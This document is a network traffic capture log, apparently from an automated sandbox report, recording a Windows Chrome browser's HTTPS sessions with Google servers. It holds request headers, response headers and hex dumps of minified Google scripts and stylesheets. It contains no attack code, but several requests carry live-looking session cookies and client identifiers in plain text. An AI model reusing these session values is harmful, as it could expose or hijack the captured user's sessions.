2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 65 41 6c 6c 28 22 2d 22 2c 22 5f 22 29 3b 61 3d 5f 2e 6b 66 28 61 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 75 4e 61 28 61 29 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 65 77 20 4d 61 70 2c 62 3d 5f 2e 58 63 28 22 65 6a 4d 4c 43 64 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 47 65 6f 22 2c 5f 2e 50 6b 28 62 29 29 3b 62 3d 5f 2e 58 63 28 22 50 59 46 75 44 63 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 44 61 74 61 22 2c 5f 2e 50 6b 28 62 29 29 3b 62 3d 5f 2e 58 63 28 22 4a 48 48 4b 75 62 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 Data Ascii: eAll("-","_");a=_.kf(a);return new _.uNa(a)};}catch(e){_._DumpException(e)}try{_.wHb=function(){var a=new Map,b=_.Xc("ejMLCd");b.Fb()&&a.set("X-Geo",_.Pk(b));b=_.Xc("PYFuDc");b.Fb()&&a.set("X-Client-Data",_.Pk(b));b=_.Xc("JHHKub");b.Fb()&&a.set("X-Clie
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 28 65 3d 5f 2e 78 48 62 28 65 29 29 26 26 28 61 3d 61 2b 22 26 61 73 79 6e 63 3d 22 2b 65 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 41 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 3d 3d 3d 22 22 29 61 3d 22 2f 61 73 79 6e 63 2f 22 2b 61 3b 65 6c 73 65 20 69 66 28 62 3d 3d 3d 22 66 65 65 64 5f 61 70 69 22 29 61 3d 22 2f 66 65 65 64 2d 61 70 69 2f 61 73 79 6e 63 2f 22 2b 61 3b 65 6c 73 65 20 69 66 28 62 3d 3d 3d 22 73 65 61 72 63 68 22 29 61 3d 22 2f 22 2b 62 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 66 60 22 2b 62 29 3b 69 66 28 21 7a 48 62 2e 74 65 73 74 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 66 60 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 43 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 Data Ascii: (e=_.xHb(e))&&(a=a+"&async="+e);return a};_.AHb=function(a,b){if(b==="")a="/async/"+a;else if(b==="feed_api")a="/feed-api/async/"+a;else if(b==="search")a="/"+b;else throw Error("Ef`"+b);if(!zHb.test(a))throw Error("Ff`"+a);return a};_.CHb=function(a,b,c
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 2b 28 63 61 6c 6c 62 61 63 6b 3a 5c 64 2b 29 3f 24 2f 69 3b 5f 2e 45 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 5f 2e 46 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 47 48 62 3d 5f 2e 58 43 61 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6f 48 62 3d 5f 2e 4b 28 22 7a 62 57 32 43 66 22 29 3b 5f 2e 70 48 62 3d 5f 2e 4b 28 22 4f 5a 33 4d 37 65 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6e 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 7b 7d 3a 63 3b 5f 2e 4b 49 61 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 64 3d 3d 3d 76 6f 69 64 20 30 3f 32 3a Data Ascii: +(callback:\d+)?$/i;_.EHb=function(){};_.FHb=function(){};GHb=_.XCa;}catch(e){_._DumpException(e)}try{_.oHb=_.K("zbW2Cf");_.pHb=_.K("OZ3M7e");}catch(e){_._DumpException(e)}try{_.nHb=function(a,b,c,d){c=c===void 0?{}:c;_.KIa.call(this,a,d===void 0?2:
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 31 5d 29 7d 3b 5f 2e 72 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 64 65 74 61 69 6c 73 29 7b 69 66 28 61 2e 64 65 74 61 69 6c 73 2e 73 3d 3d 3d 34 32 39 29 7b 76 61 72 20 62 3d 61 2e 64 65 74 61 69 6c 73 2e 72 75 72 6c 3b 69 66 28 28 30 2c 5f 2e 73 62 61 29 28 62 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 22 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 62 7d 69 66 28 61 2e 64 65 74 61 69 6c 73 2e 65 29 72 65 74 75 72 6e 20 5f 2e 72 49 62 28 61 2e 64 65 74 61 69 6c 73 2e 65 29 7d 7d 3b 0a 5f 2e 74 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 73 49 62 2b 2b 3b 73 49 62 3d 3d 3d 31 26 26 5f 2e 68 70 61 28 22 64 6f 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: odeURIComponent(b[1])};_.rIb=function(a){if(a.details){if(a.details.s===429){var b=a.details.rurl;if((0,_.sba)(b)&&b.indexOf("/sorry/index?")>-1)return b}if(a.details.e)return _.rIb(a.details.e)}};_.tIb=function(a,b){sIb++;sIb===1&&_.hpa("dos",function()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49746	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:26 UTC	1565	OUT	POST /gen_204?s=webhp&t=aft&atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&rt=wsrt.6165,aft.3654,afti.3654,cbt.201,hst.82,prt.2778&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&opi=89978449&dt=&ts=205822 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:27 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5s_PO-_6Qz34yyLZSG3G-g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:26 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49753	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:27 UTC	1404	OUT	GET /client_204?atyp=i&biw=1034&bih=870&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:28 UTC	758	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4RF5Z1CUKQZCQeF-1aifDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:28 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49757	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:29 UTC	1650	OUT	GET /xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=0/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=sylx,sypx?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:29 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1689 Date: Thu, 12 Dec 2024 21:40:29 GMT Expires: Fri, 12 Dec 2025 21:40:29 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:29 UTC	581	IN	Data Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
2024-12-12 21:40:29 UTC	443	IN	Data Raw: 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 Data Ascii: nf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default
2024-12-12 21:40:29 UTC	665	IN	Data Raw: 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6d 61 74 65 72 69 61 6c 2f 73 79 73 74 65 6d 2f 31 78 2f 64 6f 6e 65 5f 62 6c 61 63 6b 5f 31 36 64 70 2e 70 6e 67 29 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e Data Ascii: nDe{background:no-repeat left 8px center}.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)}@media (forced-colors:active){.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49759	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:29 UTC	542	OUT	OPTIONS /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: content-encoding,content-type Origin: https://www.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-12 21:40:30 UTC	529	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,content-encoding,content-type,origin Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:30 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49758	172.217.17.78	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:29 UTC	1097	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:30 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 11 Dec 2024 22:22:46 GMT Expires: Thu, 11 Dec 2025 22:22:46 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 83864 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:30 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f Data Ascii: lue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 Data Ascii: unction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a
